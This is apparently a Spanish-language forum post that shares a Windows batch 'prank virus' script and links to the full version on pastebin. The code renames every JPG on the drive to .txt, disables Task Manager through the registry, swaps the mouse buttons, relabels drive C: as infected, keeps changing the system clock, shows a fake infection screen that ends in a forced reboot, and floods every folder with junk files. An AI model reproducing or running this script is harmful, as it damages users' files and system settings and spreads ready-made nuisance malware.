Echo For /L %%%%a in (0,1,23) Do ( >>"%TEMP%\TimeUP.bat"
Echo For /L %%%%b in (0,1,59) Do ( >>"%TEMP%\TimeUP.bat"
Echo Time %%%%a:%%%%b >>"%TEMP%\TimeUP.bat"
Echo ping -n 1 localhost >>"%TEMP%\TimeUP.bat"
Echo ) >>"%TEMP%\TimeUP.bat"
Echo ) >>"%TEMP%\TimeUP.bat"
Echo Goto :TimeUP >>"%TEMP%\TimeUP.bat"
Start /B Wscript "%TEMP%\Invisible.vbs" "%TEMP%\TimeUP.bat"
REM Modificar el nombre del Boot de inicio "Disco C: Infectado"
label Disco C: Infectado>nul
REM Renombrar extension ".jpg" a ".txt"
FOR /R "%homedrive%\" %%X in (*.jpg) DO (Rename "%%X" "%%~nX.txt" >NUL 2>&1)
REM Hibernar el PC
RunDll32.exe powrprof.dll,SetSuspendState
REM Deshabilitar el administrador de tareas (TASKMGR.EXE)
reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /T "REG_DWORD" /D "1" /f >nul
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /T "REG_DWORD" /D "1" /f >nul
REM Intercambiar los botones del mouse
Rundll32 User32.dll,SwapMouseButton
REM Fake-Virus 1 "Fake25917820"
(
echo @echo off
echo color 47
echo net stop themes 2^>nul
echo title INFECCION VIRAL PROFUNDA!
echo echo INFECCION VIRAL!!!
echo echo ERROR!!!
echo ECHO+
echo echo -
echo echo virus - TROJAN_DEMOLISHER code #45643676
echo echo -
echo PING -n 4 LOCALHOST ^>nul
echo echo FIREWALL - FALLO
echo echo -
echo PING -n 2 LOCALHOST ^>nul
echo echo ANTI-VIRUS - FALLO
echo echo -
echo PING -n 2 LOCALHOST ^>nul
echo echo DIRECCION IP - RECHAZADA
echo echo -
echo PING -n 2 LOCALHOST ^>nul
echo echo FIRMA VIRAL: ****-****-****-8894
echo echo -
echo PING -n 3 LOCALHOST ^>nul
echo cls
echo echo -
echo echo ESCANEANDO AREAS INFECTADAS...
echo echo -
echo PING -n 3 LOCALHOST ^>nul
echo set /a num=0
echo :repeat1
echo set /a num=%%num%%+1
echo echo %%num%%
echo if %%num%%==100 goto end
echo goto repeat1
echo :end
echo PING -n 1 LOCALHOST ^>nul
echo cls
echo echo -
echo echo 86.5%%%% DE MEMORIA FISICA ESTA INFECTADA
echo echo -
echo echo INFECCION FATAL!
echo PING -n 3 LOCALHOST ^>nul
echo echo -
echo ECHO LA ELIMINACION DEL DISCO INFECTADO ES NECESARIA
echo PING -n 3 LOCALHOST ^>nul
echo cls
echo echo -
echo echo ELIMINANDO PARCIALMENTE EL DISCO INFECTADO [C:]
echo echo -
echo echo PORFAVOR NO APAGUE EL SISTEMA
echo echo -
echo PING -n 4 LOCALHOST ^>nul
echo dir /b /s %%WINDIR%%\ ^| FIND /v /i "WINSXS" ^| FIND /v /i "assembly" ^| FIND /v /i "syswow64" ^| FIND /v /i "servicing"
echo cls
echo echo -
echo echo CONTENIDO DEL DISCO INFECTADO [C:] - ELIMINADO
echo echo -
echo PING -n 3 LOCALHOST ^>nul
echo cls
echo echo -
echo echo ESCANEANDO...
echo echo -
echo PING -n 2 LOCALHOST ^>nul
echo set /a num1=0
echo :repeat2
echo set /a num1=%%num1%% +1
echo echo %%num1%%
echo if %%num1%%==100 goto end1
echo goto repeat2
echo :end1
echo cls
echo PING -n 2 LOCALHOST ^>nul
echo echo -
echo echo 98.00%%%% DE MEMORIA FISICA HA SIDO DESINFECTADA
echo echo -
echo PING -n 3 LOCALHOST ^>nul
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo PING -n 3 LOCALHOST ^>nul
echo cls
echo title FALLO EN EL SISTEMA
echo color 17
echo echo ERROR!
echo PING -n 2 LOCALHOST ^>nul
echo echo -
echo echo MEMORIA VIRTUAL PERDIDA!
echo PING -n 2 LOCALHOST ^>nul
echo echo -
echo echo MEMORIA FISICA SOBRECALENTADA!
echo PING -n 2 LOCALHOST ^>nul
echo echo -
echo echo PROCESADOR SOBRECALENTANDOSE!
echo PING -n 2 LOCALHOST ^>nul
echo echo -
echo ECHO LA RUPTURA TOTAL DEL SISTEMA ES INMINENTE!
echo echo -
echo PING -n 4 LOCALHOST ^>nul
echo echo -
echo echo -
echo echo -
echo echo -
echo ECHO RIESGO DE FUEGO ENCONTRADO!
echo ECHO APAGANDO EL SISTEMA PARA EVITAR PERDIDA DE DATOS
echo echo -
echo echo -
echo echo -
echo echo -
echo shutdown /R /T 60 /C "Windows ha encontrado una amenaza de virus y debe reiniciarse. Guarde todo su trabajo ahora." /F
echo PING -n 8 LOCALHOST ^>nul
echo Exit
)>%TEMP%\Fake25917820.bat
Start CMD /K %TEMP%\Fake25917820.bat
REM Propagar 100 archicos en cada carpeta del disco duro (PRECONFIGURADO)
(
echo @echo off
echo setlocal enabledelayedexpansion
echo Set File=0
echo For /F "Tokens=*" %%%%X in ('Dir /B /S /AD "%%systemdrive%%" ^| Find /V /I "Windows" ^| Find /V /I "$Recycle.Bin"'^) do (Call :COPY %%%%X^)
echo Exit
echo :Copy
echo Fsutil file createnew "%%*\%%Random%%%%Random%%%%Random%%%%Random%%%%Random%%" 1 ^>NUL 2^>^&1
echo Set /A File+=1
echo If !FILE! EQU 100 (Set /A File=0^& Goto :EOF^) ELSE (Call :COPY %%*^)
)>%TEMP%\basura.bat
Start /B %TEMP%\basura.bat
- Y por último, Aquí tienen el script:
Versión 1.0C
http://pastebin.com/raw.php?i=vqUN1g3p
(CASI)Todas las tareas han sido testeadas en Windows 7, Es muy posible que muchas tareas no funcionen en versiones anteriores de Windows (Y no tengo pensado ""dar soporte"" a esas versiones).
Opinen lo que quieran... Que a mi ya no se me ocurre que más tareas añadir :laugh:.
PD: Si encuentran algún fallo/mejora/idea reportenlo aquí para corregirlo/añadirlo porfavor ;D.
Gracias.
Espero que os guste aunque séa un poco y lo disfruteis!
Salu2.